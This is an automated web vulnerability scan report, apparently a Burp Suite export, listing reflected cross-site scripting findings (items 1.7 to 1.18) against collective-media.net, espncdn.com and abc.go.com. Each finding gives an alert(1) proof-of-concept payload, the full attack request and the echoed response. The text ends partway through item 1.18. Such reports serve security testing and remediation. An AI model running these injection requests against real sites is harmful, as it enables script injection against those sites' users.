Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 627
Date: Sat, 26 Feb 2011 00:19:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484?5e66d'-alert(1)-'827aa445761;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b73f'-alert(1)-'409c7f48e56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj4b73f'-alert(1)-'409c7f48e56/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:31 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:31 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:31 GMT
Content-Length: 8216

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-38123617_1298679571","http://ad.doubleclick.net/adj4b73f'-alert(1)-'409c7f48e56/manta.comp/energy_resources;net=mt;u=,mt-38123617_1298679571,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;cmw=owl;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;s
...[SNIP]...

1.8. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e702'-alert(1)-'a761657800e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp3e702'-alert(1)-'a761657800e/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:32 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:32 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:32 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:32 GMT
Content-Length: 8208

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-14050729_1298679572","http://ad.doubleclick.net/adj/manta.comp3e702'-alert(1)-'a761657800e/energy_resources;net=mt;u=,mt-14050729_1298679572,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;
...[SNIP]...

1.9. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf5cf'-alert(1)-'a9747c5027c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resourcesbf5cf'-alert(1)-'a9747c5027c;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:37 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:37 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:37 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:37 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:37 GMT
Content-Length: 8208

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-67481131_1298679577","http://ad.doubleclick.net/adj/manta.comp/energy_resourcesbf5cf'-alert(1)-'a9747c5027c;net=mt;u=,mt-67481131_1298679577,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resour
...[SNIP]...

1.10. http://a.collective-media.net/cmadj/manta.comp/energy_resources [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522e1'-alert(1)-'148a505a1cf was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;k=522e1'-alert(1)-'148a505a1cf HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/manta/mads/generic.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; apnx=1; nadp=1; blue=1; qcdp=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:20:32 GMT
Connection: close
Content-Length: 7273

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
a.createAndAttachAd("manta-99230702_1298679632","http://ad.doubleclick.net/adj/manta.comp/energy_resources;net=manta;u=,manta-99230702_1298679632,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;k=522e1'-alert(1)-'148a505a1cf;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

1.11. http://a.collective-media.net/cmadj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2b1'-alert(1)-'8f009f52149 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources?5c2b1'-alert(1)-'8f009f52149=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-sea; blue=1; dp2=1; apnx=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; rdst11=1; targ=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 26 Feb 2011 01:50:07 GMT
Content-Length: 7270
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("manta-12346973_1298685007","http://ad.doubleclick.net//manta.comp/energy_resources?5c2b1'-alert(1)-'8f009f52149=1;net=manta;u=,manta-12346973_1298685007,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

1.12. http://a.collective-media.net/cmadj/manta.comp/energy_resources [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc135'-alert(1)-'315ca7472f3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;pos=cc135'-alert(1)-'315ca7472f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:22 GMT
Connection: close
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:22 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:22 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:22 GMT
Content-Length: 7790

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
createAndAttachAd("manta-14301451_1298679562","http://ad.doubleclick.net/adj/manta.comp/energy_resources;net=manta;u=,manta-14301451_1298679562,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;pos=cc135'-alert(1)-'315ca7472f3;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

1.13. http://a.espncdn.com/combiner/c [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload ddc15<script>alert(1)</script>ddb75005989 was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c?css=photo.galleries.r3.cssddc15<script>alert(1)</script>ddb75005989 HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 23 Feb 2011 21:42:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW04
Cache-Expires: Sun, 24 Apr 2011 21:42:44 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:42:43 GMT
Connection: close
Content-Length: 245


/** ERROR: photo.galleries.r3.cssddc15<script>alert(1)</script>ddb75005989: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/prod/styles/photo.galleries.r3.cssddc15<script>
...[SNIP]...

1.14. http://a.espncdn.com/combiner/c [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload ab3e3<script>alert(1)</script>86514540ca5 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c?js=analytics/sOmni.js,analytics/analytics.js,analytics/zf.js,analytics/externalnielsen.jsab3e3<script>alert(1)</script>86514540ca5&xhr=1 HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW05
Cache-Expires: Sun, 24 Apr 2011 21:43:19 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:43:17 GMT
Connection: close
Content-Length: 53472

if(typeof (s_account)!="undefined"&&s_account!=""){if(s_account=="wdgespuk"||s_account=="wdgespstar"||s_account=="wdgesp360europe"||s_account=="wdgesp360prodigymexico"||s_account=="wdgesp360terrabrazi
...[SNIP]...
<img src='"+A+"' style='display:none' />");});}
/** ERROR: analytics/externalnielsen.jsab3e3<script>alert(1)</script>86514540ca5: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/prod/scripts/analytics/externalnielsen.jsab3e3<script>
...[SNIP]...

1.15. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c/201012011221

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload d6911*/alert(1)//17464b787b5 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /combiner/c/201012011221?js=jquery-1.4.2.1.js,plugins/json2.r3.js,plugins/teacrypt.js,plugins/jquery.metadata.js,plugins/jquery.bgiframe.js,plugins/jquery.easing.1.3.js,plugins/jquery.hoverIntent.js,plugins/jquery.jcarousel.js,plugins/jquery.tinysort.r3.js,plugins/jquery.pubsub.r5.js,ui/1.8.2/jquery.ui.core.js,ui/1.8.2/jquery.ui.widget.js,ui/1.8.2/jquery.ui.tabs.js,ui/1.8.2/jquery.ui.accordion.js,plugins/ba-debug-0.4.js,espn.l10n.r8.js,swfobject/2.2/swfobject.js,flashObjWrapper.r7.js,plugins/jquery.colorbox.1.3.14.js,plugins/jquery.ba-postmessage.js,espn.core.duo.r49.js,espn.mem.r15.js,espn.mem.r16.js,stub.search.r3.js,espn.nav.mega.r30.js,espn.storage.r6.js,espn.p13n.r9.js,espn.video.r33a.js,registration/staticLogin.r10-14.js,espn.universal.overlay.r1.1.js,espn.insider.r5.js,espn.espn360.stub.r9.js,espn.myHeadlines.stub.r12.js,espn.myfaves.stub.r3.js,espn.scoreboard.r6.js,espn.partner.videobox.r3.js,%2Fforesee_v3%2Fforesee-alive.jsd6911*/alert(1)//17464b787b5&development=true HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW04
Cache-Expires: Sun, 24 Apr 2011 21:43:17 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5183999
Date: Wed, 23 Feb 2011 21:43:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 327815

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
B.length;D++){var H=B[D].split("=");if(!H||H.length!=2){continue;}var C=unescape(H[0]);var G=unescape(H[1]);G=G.replace(/\+/g," ");F[C]=G;}return F;};})(jQuery);
/** ERROR: /foresee_v3/foresee-alive.jsd6911*/alert(1)//17464b787b5: http://espnsource01c.starwave.com:9081/dev/scripts/foresee_v3/foresee-alive.jsd6911*/alert(1)//17464b787b5 **/

1.16. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c/201012011221

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload c8e3d<script>alert(1)</script>23f304513d3 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c/201012011221?js=c8e3d<script>alert(1)</script>23f304513d3&development=true HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW01
Cache-Expires: Sun, 24 Apr 2011 21:43:15 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:43:14 GMT
Connection: close
Content-Length: 201


/** ERROR: c8e3d<script>alert(1)</script>23f304513d3: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/dev/scripts/c8e3d<script>alert(1)</script>23f304513d3 **/
...[SNIP]...

1.17. http://abc.go.com/watch [aa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aa request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e7b"-alert(1)-"850c9a5da4a was submitted in the aa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F27e7b"-alert(1)-"850c9a5da4a&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:25 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:25 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F27e7b"-alert(1)-"850c9a5da4a&partner=&pc=&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

1.18. http://abc.go.com/watch [aa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aa request parameter is copied into an HTML comment. The payload 992fa--><script>alert(1)</script>cc4d89a2688 was submitted in the aa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

